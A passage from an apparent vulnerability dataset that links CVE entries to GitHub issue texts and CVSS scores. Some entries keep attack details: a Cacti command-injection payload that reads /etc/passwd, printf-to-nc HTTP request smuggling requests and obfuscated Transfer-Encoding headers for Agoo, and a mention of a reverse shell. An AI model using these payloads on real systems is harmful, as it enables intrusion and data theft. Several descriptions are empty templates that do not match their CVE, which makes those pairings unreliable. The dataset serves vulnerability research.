NUMBERTAG Using regex to catch all other strings different from expected string NUMBERTAG Hard coding perl script into source code and force the application to take only NUMBERTAG filtered input (hostname). Chi Tran research APITAG",
  61590. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  61591. "severity": "HIGH",
  61592. "baseScore": 8.8,
  61593. "impactScore": 5.9,
  61594. "exploitabilityScore": 2.8
  61595. },
  61596. {
  61597. "CVE_ID": "CVE-2020-7105",
  61598. "Issue_Url_old": "https://github.com/redis/hiredis/issues/747",
  61599. "Issue_Url_new": "https://github.com/redis/hiredis/issues/747",
  61600. "Repo_new": "redis/hiredis",
  61601. "Issue_Created_At": "2020-01-09T21:34:41Z",
  61602. "description": "Several potential null pointer dereferencing. The following code never aborts when malloc is unsuccessful, causing dereferencing of null pointers. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  61603. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61604. "severity": "HIGH",
  61605. "baseScore": 7.5,
  61606. "impactScore": 3.6,
  61607. "exploitabilityScore": 3.9
  61608. },
  61609. {
  61610. "CVE_ID": "CVE-2020-7106",
  61611. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3191",
  61612. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3191",
  61613. "Repo_new": "cacti/cacti",
  61614. "Issue_Created_At": "2020-01-15T19:15:24Z",
  61615. "description": "Data source. Describe the bug A clear and concise description of what the bug is. To Reproduce Steps to reproduce the behavior NUMBERTAG Go to NUMBERTAG Click on NUMBERTAG Scroll down to NUMBERTAG See error Expected behavior A clear and concise description of what you expected to happen. Screenshots If applicable, add screenshots to help explain your problem. Desktop (please complete the following information): OS: [e.g. iOS] Browser [e.g. chrome, safari] Version [e.g NUMBERTAG Smartphone (please complete the following information): Device: [e.g. APITAG OS: [e.g. iOS NUMBERTAG Browser [e.g. stock browser, safari] Version [e.g NUMBERTAG Additional context Add any other context about the problem here.",
  61616. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  61617. "severity": "MEDIUM",
  61618. "baseScore": 6.1,
  61619. "impactScore": 2.7,
  61620. "exploitabilityScore": 2.8
  61621. },
  61622. {
  61623. "CVE_ID": "CVE-2020-7218",
  61624. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/7002",
  61625. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/7002",
  61626. "Repo_new": "hashicorp/nomad",
  61627. "Issue_Created_At": "2020-01-28T19:12:17Z",
  61628. "description": "Reserved Issue Number. TBD",
  61629. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61630. "severity": "HIGH",
  61631. "baseScore": 7.5,
  61632. "impactScore": 3.6,
  61633. "exploitabilityScore": 3.9
  61634. },
  61635. {
  61636. "CVE_ID": "CVE-2020-7219",
  61637. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/7159",
  61638. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/7159",
  61639. "Repo_new": "hashicorp/consul",
  61640. "Issue_Created_At": "2020-01-28T23:54:20Z",
  61641. "description": "Reserved Issue Number.",
  61642. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61643. "severity": "HIGH",
  61644. "baseScore": 7.5,
  61645. "impactScore": 3.6,
  61646. "exploitabilityScore": 3.9
  61647. },
  61648. {
  61649. "CVE_ID": "CVE-2020-7226",
  61650. "Issue_Url_old": "https://github.com/vt-middleware/cryptacular/issues/52",
  61651. "Issue_Url_new": "https://github.com/vt-middleware/cryptacular/issues/52",
  61652. "Repo_new": "vt-middleware/cryptacular",
  61653. "Issue_Created_At": "2020-01-19T15:37:20Z",
  61654. "description": "Denial of Service in latest version NUMBERTAG Please confirm if it is a serurity vulnerability. Mitre id: CVETAG Reporter: findneo > APITAG description] > APITAG in > Cryptacular NUMBERTAG as used in Apereo CAS and other products, allows > attackers to trigger excessive memory allocation during a decode > operation, because the nonce array length associated with \"new byte\" may > depend on untrusted input within the header of encoded data. > > > > APITAG Information] > any encoded network communication based on > APITAG APITAG is affected. xxx of > new byte[xxx] can be controlled by client and can be up to NUMBERTAG ffffffd > ,which caused NUMBERTAG G of memory consuming without demanding for any > privilege. > > one of the products using this vuln code is APITAG > login flow of cas NUMBERTAG based on > APITAG APITAG APITAG > speaking,the affected code is > APITAG decode > > besides,codebase for cas NUMBERTAG is URLTAG > > > > APITAG Other] > Denial of Service > > > > APITAG of Product] > FILETAG > > > > APITAG Product Code Base] > cryptacular NUMBERTAG APITAG Component] > APITAG APITAG , > URLTAG > > > > APITAG Type] > Remote > > > > APITAG Denial of Service] > true > > > > APITAG Vectors] > a crafted header of encoded data. > e.g PATHTAG >",
  61655. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61656. "severity": "HIGH",
  61657. "baseScore": 7.5,
  61658. "impactScore": 3.6,
  61659. "exploitabilityScore": 3.9
  61660. },
  61661. {
  61662. "CVE_ID": "CVE-2020-7229",
  61663. "Issue_Url_old": "https://github.com/niteosoft/simplejobscript/issues/7",
  61664. "Issue_Url_new": "https://github.com/niteosoft/simplejobscript/issues/7",
  61665. "Repo_new": "niteosoft/simplejobscript",
  61666. "Issue_Created_At": "2020-01-10T14:55:41Z",
  61667. "description": "SQL injection in search function. Description: APITAG is vulnerable to SQL injection in the search function. Environment: Version NUMBERTAG OS: Ubuntu NUMBERTAG Web server: Apache NUMBERTAG PHP NUMBERTAG Database: APITAG NUMBERTAG URL: /searched Payload: APITAG Steps to Reproduce: CODETAG APITAG FILETAG",
  61668. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61669. "severity": "CRITICAL",
  61670. "baseScore": 9.8,
  61671. "impactScore": 5.9,
  61672. "exploitabilityScore": 3.9
  61673. },
  61674. {
  61675. "CVE_ID": "CVE-2020-7237",
  61676. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3201",
  61677. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3201",
  61678. "Repo_new": "cacti/cacti",
  61679. "Issue_Created_At": "2020-01-19T06:04:29Z",
  61680. "description": "Vulnerability Report: Remote Code Execution due to input validation in Performance Boost Debug Log. Describe the bug An input validation error found in Boost Debug Log field leads to Remote Code Execution. To Reproduce Steps to reproduce the behavior NUMBERTAG Navigate to Console > Configuration > Settings > Performance NUMBERTAG In Boost Debug Log field, type in the payload: APITAG NUMBERTAG Save. Even the $input_whitelisting in FILETAG is ON, it would still accept this payload NUMBERTAG Wait a little bit until new polling cycle gets fetched. Navigate to APITAG to see /etc/passwd content. Screenshots Payload FILETAG Successfully saved the payload FILETAG /etc/passwd content FILETAG Root cause Not like other fields in Configuration tab, Boost Debug Log would still be saved even if the input contains special characters. Tracing back to server log, I observed that this is being handled by FILETAG where it gets fetched by the poller process. Taking a look at the FILETAG , I observed that there are NUMBERTAG different arguments that can be used to passed into its command. Hence, we can use either debug, force, verbose, version, or help to pass into Boost Debug Log field. After crafting a payload, the script will look like: /bin/php FILETAG verbose; cat /etc/passswd > FILETAG where it gets fetched by the new poller process and create FILETAG in webroot. Remediation Apply a check on this field (i.e: input length, input characters) If this field is supposed to take these mentioned arguments, create a drop down menu instead of string field if possible. Please let me know if you need any further information. Chi Tran",
  61681. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  61682. "severity": "HIGH",
  61683. "baseScore": 8.8,
  61684. "impactScore": 5.9,
  61685. "exploitabilityScore": 2.8
  61686. },
  61687. {
  61688. "CVE_ID": "CVE-2020-7238",
  61689. "Issue_Url_old": "https://github.com/jdordonezn/CVE-2020-72381/issues/1",
  61690. "Issue_Url_new": "https://github.com/jdordonezn/cve-2020-72381/issues/1",
  61691. "Repo_new": "jdordonezn/cve-2020-72381",
  61692. "Issue_Created_At": "2020-01-26T19:58:20Z",
  61693. "description": "HTTP Request Smuggling in Netty APITAG Netty APITAG allows HTTP Request Smuggling because it mishandles Transfer Encoding whitespace (such as a FILETAG Normal request FILETAG Processing of netty FILETAG",
  61694. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  61695. "severity": "HIGH",
  61696. "baseScore": 7.5,
  61697. "impactScore": 3.6,
  61698. "exploitabilityScore": 3.9
  61699. },
  61700. {
  61701. "CVE_ID": "CVE-2020-7350",
  61702. "Issue_Url_old": "https://github.com/rapid7/metasploit-framework/issues/13026",
  61703. "Issue_Url_new": "https://github.com/rapid7/metasploit-framework/issues/13026",
  61704. "Repo_new": "rapid7/metasploit-framework",
  61705. "Issue_Created_At": "2020-03-04T17:31:41Z",
  61706. "description": "possible vulnerability in libnotify. the plugin libnotify has a command injection vulnerability which could be triggered when the client imports info as hostnames or services specially crafted from another tool The impact is low because is not possible to tamper the hostname when the client runs a scan with nmap for example in the libnotify's callback of db_host: APITAG if we could tamper the field os_name, this data lands in a call to system in notify send in order to display the notification APITAG Steps to reproduce How'd you do it NUMBERTAG load the plugin: APITAG NUMBERTAG Now if we import the hosts' info from another tool (as faraday, openvas or nessus) and we don't have limitations in the hostname field, the importer plugin will run our field without sanitizing the plugin will run something similar to: CODETAG in this case, I made a little APITAG running a reverse shell in another port the impact is really low because tools as nmap filter the hostname based on the fingerprint of the OS so is not easy to trigger the bug in a scan for example, but in a plugin importer could be fit",
  61707. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61708. "severity": "HIGH",
  61709. "baseScore": 7.8,
  61710. "impactScore": 5.9,
  61711. "exploitabilityScore": 1.8
  61712. },
  61713. {
  61714. "CVE_ID": "CVE-2020-7376",
  61715. "Issue_Url_old": "https://github.com/rapid7/metasploit-framework/issues/14008",
  61716. "Issue_Url_new": "https://github.com/rapid7/metasploit-framework/issues/14008",
  61717. "Repo_new": "rapid7/metasploit-framework",
  61718. "Issue_Created_At": "2020-08-17T10:00:48Z",
  61719. "description": "PATHTAG permits remote command execution on Metasploit host. On the victim soon to be attacker host create some fun executables : ERRORTAG CODETAG On the attacker soon to be the victim host start a multi handler like any other day: ERRORTAG On the victim soon to be attacker host give the \"attacker\" a shell in a root user namespace: ERRORTAG On the attacker soon to be the victim host enjoy the new shell and enumerate some host info with APITAG (also check there's no funny cron jobs or anything listening on APITAG , because that would be bad) : ERRORTAG On the victim soon to be the attacker host: CODETAG After patch NUMBERTAG ERRORTAG",
  61720. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61721. "severity": "CRITICAL",
  61722. "baseScore": 9.8,
  61723. "impactScore": 5.9,
  61724. "exploitabilityScore": 3.9
  61725. },
  61726. {
  61727. "CVE_ID": "CVE-2020-7377",
  61728. "Issue_Url_old": "https://github.com/rapid7/metasploit-framework/issues/14015",
  61729. "Issue_Url_new": "https://github.com/rapid7/metasploit-framework/issues/14015",
  61730. "Repo_new": "rapid7/metasploit-framework",
  61731. "Issue_Created_At": "2020-08-18T08:48:55Z",
  61732. "description": "PATHTAG ERRORTAG method is vulnerable to directory traversal resulting in arbitrary file write on the Metasploit host. The ERRORTAG method in the APITAG module is vulnerable to directory traversal resulting in arbitrary file write. This can be used to achieve remote command execution on the Metasploit host from a remote malicious webserver masquerading as a Telpho NUMBERTAG system. Vulnerable Code ERRORTAG APITAG ERRORTAG",
  61733. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  61734. "severity": "HIGH",
  61735. "baseScore": 7.5,
  61736. "impactScore": 3.6,
  61737. "exploitabilityScore": 3.9
  61738. },
  61739. {
  61740. "CVE_ID": "CVE-2020-7661",
  61741. "Issue_Url_old": "https://github.com/kevva/url-regex/issues/70",
  61742. "Issue_Url_new": "https://github.com/kevva/url-regex/issues/70",
  61743. "Repo_new": "kevva/url-regex",
  61744. "Issue_Created_At": "2020-04-26T22:13:22Z",
  61745. "description": "CORE BUG + SECURITY VULNERABILITY Parsing a long String will result in NUMBERTAG CPU usage and APITAG will never finish. Example: `sh > require('url regex')({ strict: false APITAG",
  61746. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61747. "severity": "HIGH",
  61748. "baseScore": 7.5,
  61749. "impactScore": 3.6,
  61750. "exploitabilityScore": 3.9
  61751. },
  61752. {
  61753. "CVE_ID": "CVE-2020-7670",
  61754. "Issue_Url_old": "https://github.com/ohler55/agoo/issues/88",
  61755. "Issue_Url_new": "https://github.com/ohler55/agoo/issues/88",
  61756. "Repo_new": "ohler55/agoo",
  61757. "Issue_Created_At": "2020-05-16T00:01:28Z",
  61758. "description": "Protect agains smuggling attacks. Testbed used to verify the vulnerability: URLTAG The following requests can be send via command line (tested on ubuntu) to reproduce the behaviour Double Content Length Headers printf 'GET /hello HTTP NUMBERTAG APITAG Length NUMBERTAG APITAG Length NUMBERTAG APITAG APITAG '\\ ' '\\ 'GET /smuggle HTTP NUMBERTAG APITAG APITAG '\\ ' ' | nc APITAG NUMBERTAG Invalid Transfer Encoding Header printf 'POST / HTTP NUMBERTAG APITAG '\\ APITAG ENCODING: chunked '\\ APITAG Type: application/x www form urlencoded NUMBERTAG nc APITAG NUMBERTAG Agoo allows multiple malformed variations of the Transfer Encoding header A request with Content Length and malformed Transfer encoding headers that can be sent to a backend server and conduct CL:TE attacks. ( URLTAG POST /hello HTTP NUMBERTAG Host: APITAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Transfer Encoding : chunked NUMBERTAG In the above example, the request is sent with the Transfer encoding header having extra spaces APITAG Encoding : chunked). This is in violation of RFC NUMBERTAG Agoo was also found to allow multiple variations of bad transfer encoding headers including CRLF characters, Fake Transfer encoding etc. APITAG TE.TE behavior: obfuscating the TE header section: URLTAG Some other examples that is allowed: Transfer Encoding: chunk Transfer Encoding: ch\u2013nked Transfer Encoding:\u00ffchunked Transfer Encoding:chunked tRANSFER ENCODING: chunked [space APITAG Encoding: chunked Transfer Encoding: chunked Transfer Encoding:chunked Transfer Encoding: \"chunked\" Transfer Encoding : chunked Transfer Encoding: chunked The above is proof of concept which just demonstrates the behaviour. Depending on how Algoo will be used as part of a chain of servers, this could result in a successful request smuggling attack. I am happy to provide more information regarding a successful attack. Remediation The best solution to remediate this vulnerability is to do the following: Disallow requests with double content lengths headers Ensure malformed Transfer encoding headers are not allowed. This can be done via rejecting the request and sending a NUMBERTAG back to the HTTP client As per RFC NUMBERTAG FILETAG When requests with both Content Length and Transfer encoding header is sent, the Content Length header should be ignored Remediation for the following open source projects can be used as a reference. The above points were taken from that. \u2022 URLTAG \u2022 URLTAG \u2022 URLTAG",
  61759. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  61760. "severity": "HIGH",
  61761. "baseScore": 7.5,
  61762. "impactScore": 3.6,
  61763. "exploitabilityScore": 3.9
  61764. },
  61765. {
  61766. "CVE_ID": "CVE-2020-7671",
  61767. "Issue_Url_old": "https://github.com/postrank-labs/goliath/issues/351",
  61768. "Issue_Url_new": "https://github.com/postrank-labs/goliath/issues/351",
  61769. "Repo_new": "postrank-labs/goliath",
  61770. "Issue_Created_At": "2020-06-02T19:56:15Z",
  61771. "description": "HTTP Request Smuggling Hardening. Posting it here for community patches after talking with the maintainers privately. Issue: Goliath doesn't prevent Request Smuggling attacks NUMBERTAG Goliath allows requests with multiple content lengths. When sent a request such as the below, the first content length header is ignored and the second content length header is prioritized. Since the second content length was set to zero, the backend will expect no request body and the /smuggledreq request is treated as another pipelined request. APITAG CODETAG NUMBERTAG Goliath allows multiple malformed variations of the Transfer Encoding header. Depending on how Goliath will be used as part of a chain of servers, this could result in a successful request smuggling attack. ERRORTAG Other examples: ERRORTAG How to fix: Prioritize Transfer Encoding over Content Length Remediation: This remediation will prevent CL:TE and TE:CL attacks Details: When a request with both a Transfer Encoding: chunked header and Content length is received, the transfer encoding header should be prioritized over Content Length. This is referenced in RFC NUMBERTAG Section NUMBERTAG Disallow requests with Double Content Length Remediation: This remediation will prevent CL:CL attacks Details: As mentioned in RFC NUMBERTAG Section NUMBERTAG if a HTTP request is received with multiple content length headers with different length values, this should be responded with a HTTP NUMBERTAG response. Disallow malformed Transfer encoding headers Remediation: This remediation will prevent TE:TE attacks. Details: If both a frontend and backend prioritizes the Transfer Encoding header, it could allow smuggling attacks where an attacker inserts two Transfer Encoding headers, one which would be ignored by the frontend and is processed by the backend and vice versa. As such, the following type of header variations should be rejected. More examples of header variations can be seen here: URLTAG Disallow requests with both Content length and Transfer encoding Remediation: This remediation will prevent CL:TE and TE:CL attacks Details: This can be seen as a better alternative to APITAG Transfer Encoding over Content Length\u201d solution. Runtime platforms such as FILETAG have used this solution to remediate against request smuggling where any requests with both headers are returned with a HTTP NUMBERTAG response.",
  61772. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  61773. "severity": "HIGH",
  61774. "baseScore": 7.5,
  61775. "impactScore": 3.6,
  61776. "exploitabilityScore": 3.9
  61777. },
  61778. {
  61779. "CVE_ID": "CVE-2020-7680",
  61780. "Issue_Url_old": "https://github.com/docsifyjs/docsify/issues/1126",
  61781. "Issue_Url_new": "https://github.com/docsifyjs/docsify/issues/1126",
  61782. "Repo_new": "docsifyjs/docsify",
  61783. "Issue_Created_At": "2020-04-19T19:19:47Z",
  61784. "description": "vulnerability report. APITAG APITAG APITAG APITAG APITAG Bug Report I have found a security vulnerability in docsify.sj. How would you like me to report it? Steps to reproduce What is current behaviour What is the expected behaviour Other relevant information APITAG [ ] Bug does still occur when all/other plugins are disabled? Your OS: FILETAG version: npm/yarn version: Browser version: Docsify version: Docsify plugins: APITAG Please create a reproducible sandbox APITAG NUMBERTAG qq NUMBERTAG URLTAG Mention the docsify version in which this bug was not present (if any)",
  61785. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  61786. "severity": "MEDIUM",
  61787. "baseScore": 6.1,
  61788. "impactScore": 2.7,
  61789. "exploitabilityScore": 2.8
  61790. },
  61791. {
  61792. "CVE_ID": "CVE-2020-7689",
  61793. "Issue_Url_old": "https://github.com/kelektiv/node.bcrypt.js/issues/776",
  61794. "Issue_Url_new": "https://github.com/kelektiv/node.bcrypt.js/issues/776",
  61795. "Repo_new": "kelektiv/node.bcrypt.js",
  61796. "Issue_Created_At": "2020-01-25T13:41:58Z",
  61797. "description": "Some compatibility issue with emoji. When using NUMBERTAG emoji compatibility between bcrypt APITAG php and bcrypt APITAG bcryptjs is broken, whereas bcryptjs APITAG php is fine. Code to represent the issue. CODETAG The output: CODETAG Fedora NUMBERTAG bcrypt NUMBERTAG node APITAG",
  61798. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  61799. "severity": "HIGH",
  61800. "baseScore": 7.5,
  61801. "impactScore": 3.6,
  61802. "exploitabilityScore": 3.9
  61803. },
  61804. {
  61805. "CVE_ID": "CVE-2020-7690",
  61806. "Issue_Url_old": "https://github.com/MrRio/jsPDF/issues/2795",
  61807. "Issue_Url_new": "https://github.com/parallax/jspdf/issues/2795",
  61808. "Repo_new": "parallax/jspdf",
  61809. "Issue_Created_At": "2020-07-02T15:07:14Z",
  61810. "description": "XSS vulnerability in html method. When using the html method, it is possible to inject code that is executed in the user context. E.g. like this: ERRORTAG E.g., this line seems to be suspicious: URLTAG We need to analyze how to fix this and if there is other vulnerable code.",
  61811. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  61812. "severity": "MEDIUM",
  61813. "baseScore": 6.1,
  61814. "impactScore": 2.7,
  61815. "exploitabilityScore": 2.8
  61816. },
  61817. {
  61818. "CVE_ID": "CVE-2020-7692",
  61819. "Issue_Url_old": "https://github.com/googleapis/google-oauth-java-client/issues/469",
  61820. "Issue_Url_new": "https://github.com/googleapis/google-oauth-java-client/issues/469",
  61821. "Repo_new": "googleapis/google-oauth-java-client",
  61822. "Issue_Created_At": "2020-05-26T17:52:41Z",
  61823. "description": "PKCE support?. I've been looking for information about how to enable PKCE when using the APITAG but haven't found anything. Am I missing something or is PKCE not supported (out of the box) by this library?",
  61824. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  61825. "severity": "CRITICAL",
  61826. "baseScore": 9.1,
  61827. "impactScore": 5.2,
  61828. "exploitabilityScore": 3.9
  61829. },
  61830. {
  61831. "CVE_ID": "CVE-2020-7693",
  61832. "Issue_Url_old": "https://github.com/sockjs/sockjs-node/issues/252",
  61833. "Issue_Url_new": "https://github.com/sockjs/sockjs-node/issues/252",
  61834. "Repo_new": "sockjs/sockjs-node",
  61835. "Issue_Created_At": "2019-02-11T10:19:37Z",
  61836. "description": "ERR_STREAM_WRITE_AFTER_END when issuing upgrade request on non existent URL. On version NUMBERTAG and I believe in NUMBERTAG also), when issuing upgrade request on wrong URL i.e. APITAG , APITAG calls APITAG in a APITAG block and then APITAG is being called for the second time in ERRORTAG method which throws...",
  61837. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  61838. "severity": "MEDIUM",
  61839. "baseScore": 5.3,
  61840. "impactScore": 1.4,
  61841. "exploitabilityScore": 3.9
  61842. },
  61843. {
  61844. "CVE_ID": "CVE-2020-7696",
  61845. "Issue_Url_old": "https://github.com/DylanVann/react-native-fast-image/issues/690",
  61846. "Issue_Url_new": "https://github.com/dylanvann/react-native-fast-image/issues/690",
  61847. "Repo_new": "dylanvann/react-native-fast-image",
  61848. "Issue_Created_At": "2020-06-05T09:52:30Z",
  61849. "description": "APITAG Headers for one request are sent for all subsequent requests, even if no headers specified. Describe the bug When an image with APITAG is loaded, all other subsequent images will use the same headers. This can lead to images not showing, because the host header is wrong, and web servers will return ERRORTAG errors for the request. To Reproduce Steps to reproduce the behavior if possible, or a link to a reproduction repo NUMBERTAG Go to FILETAG and create a new endpoint NUMBERTAG Add an image with APITAG NUMBERTAG Create another endpoint at hookbin NUMBERTAG Add another image with APITAG , ensure it loads after image NUMBERTAG The request for image on endpoint NUMBERTAG will include the foo : bar headers. This is probably the reason of a lot of errors with images not properly showing in this repository. Additionally, this is a serious security issue, as signing credentials or other session tokens could be leaked to other servers. See screenshot below. Expected behavior Headers should not be reused. Screenshots Will add soon Dependency versions React Native version NUMBERTAG React version NUMBERTAG React Native Fast Image version NUMBERTAG",
  61850. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  61851. "severity": "MEDIUM",
  61852. "baseScore": 5.3,
  61853. "impactScore": 1.4,
  61854. "exploitabilityScore": 3.9
  61855. },
  61856. {
  61857. "CVE_ID": "CVE-2020-7699",
  61858. "Issue_Url_old": "https://github.com/richardgirges/express-fileupload/issues/236",
  61859. "Issue_Url_new": "https://github.com/richardgirges/express-fileupload/issues/236",
  61860. "Repo_new": "richardgirges/express-fileupload",
  61861. "Issue_Created_At": "2020-07-29T02:48:39Z",
  61862. "description": "Prototype Pollution. This module has prototype pollution vulnerablity and it can make DOS with APITAG option. server CODETAG exploit APITAG raw packet ERRORTAG Full description is in here URLTAG",
  61863. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61864. "severity": "CRITICAL",
  61865. "baseScore": 9.8,
  61866. "impactScore": 5.9,
  61867. "exploitabilityScore": 3.9
  61868. },
  61869. {
  61870. "CVE_ID": "CVE-2020-7710",
  61871. "Issue_Url_old": "https://github.com/hacksparrow/safe-eval/issues/19",
  61872. "Issue_Url_new": "https://github.com/hacksparrow/safe-eval/issues/19",
  61873. "Repo_new": "hacksparrow/safe-eval",
  61874. "Issue_Created_At": "2020-02-28T07:50:28Z",
  61875. "description": "Sandbox Escape. The following script can lead to safe eval sandbox escape (node APITAG ): ERRORTAG Inspired from MENTIONTAG 's vm2 escape URLTAG .",
  61876. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61877. "severity": "CRITICAL",
  61878. "baseScore": 9.8,
  61879. "impactScore": 5.9,
  61880. "exploitabilityScore": 3.9
  61881. },
  61882. {
  61883. "CVE_ID": "CVE-2020-7711",
  61884. "Issue_Url_old": "https://github.com/russellhaering/goxmldsig/issues/48",
  61885. "Issue_Url_new": "https://github.com/russellhaering/goxmldsig/issues/48",
  61886. "Repo_new": "russellhaering/goxmldsig",
  61887. "Issue_Created_At": "2019-08-14T10:53:49Z",
  61888. "description": "Crash on nil pointer dereference with malformed input. See URLTAG for background. Program which exhibits the issue: ERRORTAG Panic: ERRORTAG Potential fix: ERRORTAG",
  61889. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61890. "severity": "HIGH",
  61891. "baseScore": 7.5,
  61892. "impactScore": 3.6,
  61893. "exploitabilityScore": 3.9
  61894. },
  61895. {
  61896. "CVE_ID": "CVE-2020-7711",
  61897. "Issue_Url_old": "https://github.com/russellhaering/gosaml2/issues/59",
  61898. "Issue_Url_new": "https://github.com/russellhaering/gosaml2/issues/59",
  61899. "Repo_new": "russellhaering/gosaml2",
  61900. "Issue_Created_At": "2019-08-14T10:45:18Z",
  61901. "description": "Crash on nil pointer dereference with malformed input. I've been doing a bit of fuzzing of this package with go fuzz. I captured a valid SAML response from Okta and then had go fuzz mutate it. I have fuzzing implemented on this branch URLTAG Here's the panic in a simple test program: ERRORTAG ERRORTAG Appears to be unverified assertions can have nil parents. Appears to be fixed with this patch: ERRORTAG",
  61902. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61903. "severity": "HIGH",
  61904. "baseScore": 7.5,
  61905. "impactScore": 3.6,
  61906. "exploitabilityScore": 3.9
  61907. },
  61908. {
  61909. "CVE_ID": "CVE-2020-7712",
  61910. "Issue_Url_old": "https://github.com/trentm/json/issues/144",
  61911. "Issue_Url_new": "https://github.com/trentm/json/issues/144",
  61912. "Repo_new": "trentm/json",
  61913. "Issue_Created_At": "2020-08-06T07:10:51Z",
  61914. "description": "Command Injection. POC CODETAG",
  61915. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  61916. "severity": "HIGH",
  61917. "baseScore": 7.2,
  61918. "impactScore": 5.9,
  61919. "exploitabilityScore": 1.2
  61920. },
  61921. {
  61922. "CVE_ID": "CVE-2020-7755",
  61923. "Issue_Url_old": "https://github.com/dataarts/dat.gui/issues/278",
  61924. "Issue_Url_new": "https://github.com/dataarts/dat.gui/issues/278",
  61925. "Repo_new": "dataarts/dat.gui",
  61926. "Issue_Created_At": "2020-10-06T14:39:08Z",
  61927. "description": "Regular Expression Denial of Service APITAG in APITAG Type of Issue Potential Regex Denial of Service APITAG Description The vulnerable regular expression is located in URLTAG URLTAG The APITAG vulnerability of the regex is mainly due to the sub pattern APITAG and can be exploited with the following string APITAG You can execute the following code to reproduce APITAG ERRORTAG ERRORTAG",
  61928. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61929. "severity": "HIGH",
  61930. "baseScore": 7.5,
  61931. "impactScore": 3.6,
  61932. "exploitabilityScore": 3.9
  61933. },
  61934. {
  61935. "CVE_ID": "CVE-2020-7774",
  61936. "Issue_Url_old": "https://github.com/yargs/y18n/issues/96",
  61937. "Issue_Url_new": "https://github.com/yargs/y18n/issues/96",
  61938. "Repo_new": "yargs/y18n",
  61939. "Issue_Created_At": "2020-08-06T01:23:11Z",
  61940. "description": "Prototype pollution. POC APITAG",
  61941. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61942. "severity": "CRITICAL",
  61943. "baseScore": 9.8,
  61944. "impactScore": 5.9,
  61945. "exploitabilityScore": 3.9
  61946. },
  61947. {
  61948. "CVE_ID": "CVE-2020-7780",
  61949. "Issue_Url_old": "https://github.com/softwaremill/akka-http-session/issues/74",
  61950. "Issue_Url_new": "https://github.com/softwaremill/akka-http-session/issues/74",
  61951. "Repo_new": "softwaremill/akka-http-session",
  61952. "Issue_Created_At": "2020-03-10T13:22:17Z",
  61953. "description": "CSRF protection can be bypassed with empty header and empty cookie. Hi, During the penetration test of our system which is happily using akka http session the testers found out that it's possible to bypass the csrf protection. When you send a POST to an endpoint protected by APITAG and pass in an empty X XSRF TOKEN header and a XSRF TOKEN cookie with empty value, the filter will let you pass. I think is due to the check in APITAG on line NUMBERTAG if (submitted == cookie) { pass } but the value itself is not inspected and could possibly be empty. Hope this can be fixed, thanks, Willem",
  61954. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61955. "severity": "HIGH",
  61956. "baseScore": 8.8,
  61957. "impactScore": 5.9,
  61958. "exploitabilityScore": 2.8
  61959. },
  61960. {
  61961. "CVE_ID": "CVE-2020-7790",
  61962. "Issue_Url_old": "https://github.com/spatie/browsershot/issues/441",
  61963. "Issue_Url_new": "https://github.com/spatie/browsershot/issues/441",
  61964. "Repo_new": "spatie/browsershot",
  61965. "Issue_Created_At": "2020-11-03T06:15:46Z",
